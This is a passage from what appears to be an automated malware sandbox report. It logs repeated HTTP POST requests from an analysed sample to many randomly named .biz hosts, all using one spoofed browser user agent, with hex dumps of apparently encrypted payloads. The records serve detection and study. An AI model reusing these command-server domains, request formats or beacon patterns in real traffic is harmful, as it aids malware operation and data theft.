fa 7e 9f 4b ff 19 0e cd 8a ed fb 99 e7 c5 ee 57 b5 c7 2c c0 97 2e 97 3c 83 99 31 72 ba 65 96 36 87 b4 57 29 b3 0d ab da ca bf 0a c1 46 19 f6 9c 00 a6 2d 09 75 65 7b 43 0d ea 7e 8d 68 dc 85 7b 40 17 9f 33 91 02 78 8f 56 cd 10 7e dc 14 a1 0a e5 1c 78 c7 cb cf 32 a5 53 63 2e fa ac 4c 7b f2 f9 fd fa 23 53 72 37 8b bf 64 a7 ef a1 9b f2 8d 68 99 1a b7 e7 24 26 a1 06 0b 35 29 d3 ad 62 b5 3c 8b 99 d3 be c6 6e bb 67 0c 40 c5 50 ed dd 9b e8 80 27 83 f9 9b 93 90 8a 71 89 f3 ef bc 20 54 d7 3d c9 51 21 dd 5d c8 b2 e3 8a bb 07 63 a0 16 48 9e 35 54 46 fa 0c c5 9e ef 68 76 8b d9 f4 55 84 7f dc 4f 5a a9 91 10 d8 e4 dd 06 49 d8 4d 20 8c 27 39 b5 03 49 a7 d1 61 a4 af 4f d0 11 d4 6b f3 c3 00 57 db c1 8b 26 1f bb 5c 75 a6 37 c0 16 e8 88 c5 20 7c 2b c4 3f f5 cc 0c b4 2b ea fb c9 d9 23 59 7c a6 bb 32 05 c7 06 9c 2c c3 f5 ba 75 41 75 6f 93 9c 0a 23 5a 19 3c 06 ea 93 36 02 78 af 75 f8 6b ba 34 4b e8 4d 25 07 18 bc fc 37 b9 8e 13 98 e1 91 d1 0c 36 39 1f f2 9b f2 99 e4 9e 08 d1 d4 9d 5d 40 ec 34 0d 82 dd b1 00 cf 83 fb 44 3a cc 2f 7e ec 73 c8 2c db 54 ae e1 b2 36 40 84 bc b2 bf 4e be c1 99 82 54 a7 98 b9 63 87 32 90 9a a6 ae c1 6c 06 e5 a4 3c 3a d3 83 07 02 40 6a 20 75 23 9c 38 98 50 82 90 ca 43 af 54 c7 49 a7 ef 1a f8 d9 fa dd 75 50 c7 bd 7d 9c 4f f8 9b b1 72 20 38 45 19 8d a4 31 bd 0e ac a4 7e bf 84 5f 33 34 84 90 f5 9e b9 8d 12 b0 d3 93 f9 9b 14 e0 fb 92 d0 d0 ff 40 e8 03 45 e8 34 f1 d0 24 11 b8 34 5c 0b 47 7d 66 10 Data Ascii: e`Dq8gilY?G?NR+1fWBIbQ?e)9r!WD@/COJQ!h'_\Qg=-ww~P],VW$@j{YN;;U:2gjr.a5!M^~{MEMYM!_uyN30 _
              Source: global trafficHTTP traffic detected: POST /dqlfliuucamv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778Data Raw: 65 f9 60 f6 44 d4 ab c5 fe 02 00 00 82 71 fd d8 e6 a2 86 96 38 67 10 f6 87 69 a9 0c a1 cc 6c d2 c3 59 c3 3f 86 bf 47 3f 9e 4e 52 2b 9d a3 dc c6 94 31 11 66 da 57 d3 e4 42 97 49 62 8a e6 51 d7 3f c0 de ed c2 c5 65 9b 8f a1 0a e6 29 ed b1 9f f5 39 92 a3 10 ff bf 0a 1f 72 21 0d dc 83 57 8e ba c6 ad d3 ef f4 44 07 cf 0c 40 ab e8 15 2f d1 a4 b3 43 4f 4a 51 21 8c 68 e2 27 d4 5f d1 5c 1e fa 51 d5 c3 67 c9 3d d1 14 03 e5 2d 1b 16 77 e3 ab 77 1e 7e ce 50 5d 85 0f 13 a7 b6 e9 df cc d8 9e 04 2c 56 57 bd f3 24 15 d9 89 40 ca 6a a6 c9 07 e8 9b 7b 59 e6 18 4e 3b 3b 82 f7 eb 9b f3 55 3a 9b af d6 8b 9c 32 c7 17 c5 d6 8c 67 07 7f 6a cc 72 2e d8 b7 99 61 a2 0c 87 ef 35 8d 21 b3 4d 5e 7e a3 81 d4 7b 4d cc 05 8a 45 9e c9 80 4d 17 d9 a6 59 11 4d 07 1e 21 10 d5 1d dc cd 0a a2 14 f0 5f fa ea 75 d4 1e 79 1a 18 87 4e 1e 33 18 f2 e1 30 8c e2 bb e8 9b d6 20 0e 5f 94 b9 10 e8 f4 bb 15 04 00 b8 5f 51 1a c9 64 ef 9c 0c a2 95 9b 7e 54 fa 7e 9f 4b ff 19 0e cd 8a ed fb 99 e7 c5 ee 57 b5 c7 2c c0 97 2e 97 3c 83 99 31 72 ba 65 96 36 87 b4 57 29 b3 0d ab da ca bf 0a c1 46 19 f6 9c 00 a6 2d 09 75 65 7b 43 0d ea 7e 8d 68 dc 85 7b 40 17 9f 33 91 02 78 8f 56 cd 10 7e dc 14 a1 0a e5 1c 78 c7 cb cf 32 a5 53 63 2e fa ac 4c 7b f2 f9 fd fa 23 53 72 37 8b bf 64 a7 ef a1 9b f2 8d 68 99 1a b7 e7 24 26 a1 06 0b 35 29 d3 ad 62 b5 3c 8b 99 d3 be c6 6e bb 67 0c 40 c5 50 ed dd 9b e8 80 27 83 f9 9b 93 90 8a 71 89 f3 ef bc 20 54 d7 3d c9 51 21 dd 5d c8 b2 e3 8a bb 07 63 a0 16 48 9e 35 54 46 fa 0c c5 9e ef 68 76 8b d9 f4 55 84 7f dc 4f 5a a9 91 10 d8 e4 dd 06 49 d8 4d 20 8c 27 39 b5 03 49 a7 d1 61 a4 af 4f d0 11 d4 6b f3 c3 00 57 db c1 8b 26 1f bb 5c 75 a6 37 c0 16 e8 88 c5 20 7c 2b c4 3f f5 cc 0c b4 2b ea fb c9 d9 23 59 7c a6 bb 32 05 c7 06 9c 2c c3 f5 ba 75 41 75 6f 93 9c 0a 23 5a 19 3c 06 ea 93 36 02 78 af 75 f8 6b ba 34 4b e8 4d 25 07 18 bc fc 37 b9 8e 13 98 e1 91 d1 0c 36 39 1f f2 9b f2 99 e4 9e 08 d1 d4 9d 5d 40 ec 34 0d 82 dd b1 00 cf 83 fb 44 3a cc 2f 7e ec 73 c8 2c db 54 ae e1 b2 36 40 84 bc b2 bf 4e be c1 99 82 54 a7 98 b9 63 87 32 90 9a a6 ae c1 6c 06 e5 a4 3c 3a d3 83 07 02 40 6a 20 75 23 9c 38 98 50 82 90 ca 43 af 54 c7 49 a7 ef 1a f8 d9 fa dd 75 50 c7 bd 7d 9c 4f f8 9b b1 72 20 38 45 19 8d a4 31 bd 0e ac a4 7e bf 84 5f 33 34 84 90 f5 9e b9 8d 12 b0 d3 93 f9 9b 14 e0 fb 92 d0 d0 ff 40 e8 03 45 e8 34 f1 d0 24 11 b8 34 5c 0b 47 7d 66 10 Data Ascii: e`Dq8gilY?G?NR+1fWBIbQ?e)9r!WD@/COJQ!h'_\Qg=-ww~P],VW$@j{YN;;U:2gjr.a5!M^~{MEMYM!_uyN30 _
              Source: global trafficHTTP traffic detected: POST /tacyehq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /aky HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /bh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /xitm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /hbj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gvnfcd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /elpwpt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /yywraaixbnedu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /dgeuecv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dgeuecv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778Data Raw: e7 ff 51 3f b9 ad 1c 9e fe 02 00 00 55 72 05 0e 07 99 e0 9c 84 8f c6 d0 84 39 cd dd 0b 8d b2 1d 51 a2 a8 59 1f e7 66 93 ba 6e b2 3c bb f7 c1 b8 48 b9 0c b8 76 2b 43 91 d6 46 c6 d3 d1 81 95 e2 0d b3 91 c2 bb 98 3a 18 f3 2f 95 0d d0 17 55 aa 5e c2 70 84 e4 5d 61 57 bc d5 5a ae 6b 55 a9 4f c8 50 fb dc a8 cb 6d 88 12 74 e9 c2 a1 cb d0 3e 63 8a 19 0a e1 82 93 27 3c da 58 1f 95 bd d0 7b 19 34 1e 6e b3 99 75 a9 fc cc d2 4c e2 7a 72 68 96 87 01 6f 65 35 09 75 e8 41 04 d8 fd 15 ae b7 28 06 a8 56 c0 50 79 95 67 1f 34 4d 83 84 b3 84 e2 e0 96 2f 87 74 5e 7b 0a a6 65 42 1f ac ac 74 4a f7 e0 f9 cd 26 9e 9d ed 1a b7 47 a7 d6 19 5c 2a 18 37 8d 53 a8 77 56 73 63 1a 6a 27 b5 05 6f 25 bd dd a4 d9 82 9d 43 0c 88 4c 62 8d 95 2b 40 fa 87 59 9f 52 a5 97 de 8c de 1c 62 2e f5 e1 69 1b 76 d2 2e 43 00 9c 55 d2 43 81 e8 65 a7 df c6 7d 87 ab 3e 8a bb 36 bb 2d 57 a0 ed ae fa c0 de 44 3a d8 26 ca 95 28 61 df ef 26 50 8d a1 96 98 f1 fe bd 70 7c fb 3b 7b a8 d5 01 b0 32 79 3a 10 e9 bd de 19 8d 4a 29 2e cd 36 09 e1 46 c7 bc 4a 9a 50 ae c3 03 e6 b1 36 36 f0 5c e9 b8 0b 38 9a 08 39 d9 ac 7e 11 81 f1 48 60 6e 40 a5 3e c6 86 b7 a5 67 b2 19 88 1a f3 24 ba 44 0c 3b db 24 6e 05 39 45 00 d8 ed 19 df 19 0d 6f ca 0b 2f 86 ba c8 00 05 77 59 81 5e 3c 24 d5 a0 15 19 f8 9c 0f ba bc 3f 55 20 72 11 71 07 88 ff 39 c6 71 14 c4 77 2c 62 2f e1 87 37 d3 31 17 ad ef 45 8b 10 b4 51 8d 87 ea 49 dc bb b9 a1 df f7 ea 76 0b e3 7b 01 90 f5 cb dd a3 c3 58 6c 72 80 47 ce 04 a3 67 16 49 99 d6 7c 51 ad 86 c5 1e 2b 44 62 39 03 ec b4 32 f4 75 9b 0f a8 d7 dc 01 db fc 74 2a 9b e3 c2 9b 0d 34 61 eb 7c b5 a3 cb 27 13 a8 b1 c8 22 7c 7e 85 39 62 ef 2b 49 e9 2f 10 78 cc 51 f7 cb e2 78 69 6c 41 d3 98 75 54 0b d0 f4 97 1e 06 95 a8 7e e4 b7 bf 42 24 43 82 d8 2f 90 c9 16 a0 b5 cd d7 22 77 fe 03 e9 2e 7c 8c 42 9c 02 8e 1f 85 05 ad 92 c2 9c 96 fe e0 5e b0 cb d5 5a a6 d7 7f 1e b4 97 8a 72 ea ba f4 b4 16 77 98 e6 f6 37 76 26 40 10 19 07 c2 78 bf 75 6e ed 28 b4 6a 1b 4b 6f 35 7a e5 f2 07 8e 24 ec 21 d9 5c 16 6d 1d 20 67 01 56 d3 26 e0 ae ba 1b 77 eb ad 0e 5f d9 c0 47 5d 2d 4d 2b ac 65 21 ef 99 99 ae bf 8a d1 a6 9a 4a c3 3c db 50 cf c0 74 02 44 8b c3 0a 97 6a b5 4b c8 93 04 ca 85 3c 8e d6 9f 67 c6 00 ad 79 36 03 13 24 48 3d fd 96 e7 cc 7c 19 84 be 66 31 88 e0 31 a4 4b f1 d7 12 ea 9d 49 de 6a 4c 76 52 33 ac 17 bd e9 a4 c0 9a 53 67 03 f2 45 cb f9 d8 04 25 8a e9 77 b9 ae 99 7a 93 Data Ascii: Q?Ur9QYfn<Hv+CF:/U^p]aWZkUOPmt>c'<X{4nuLzrhoe5uA(VPyg4M/t^{eBtJ&G\*7SwVscj'o%CLb+@YRb.iv.CUCe}>6-WD:&
              Source: global trafficHTTP traffic detected: POST /ddsolxmfcvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /nljwtdwahh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /xjjg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ibdxbfqrqufvuu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /byear HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ipnvn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /liar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jpdlcoeoakm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /emmmpldkokdghu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /eyywnnlobvqfg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /fwbtaqdcjwd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /gcsq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /hbkwpskje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /js HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /feejetjxxjumqw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /scwkixjormncu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dgcyhyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /lnlr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /atyxaeuca HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ioljnnvkrvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /vcjmpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /luaao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ewjlslyiisf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /wtdwobcctwkccpvu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /fnaptxelbkqpwkk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /vyoggvtcvxheoco HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qjuvsft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /bvee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /nvddaclxpive HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
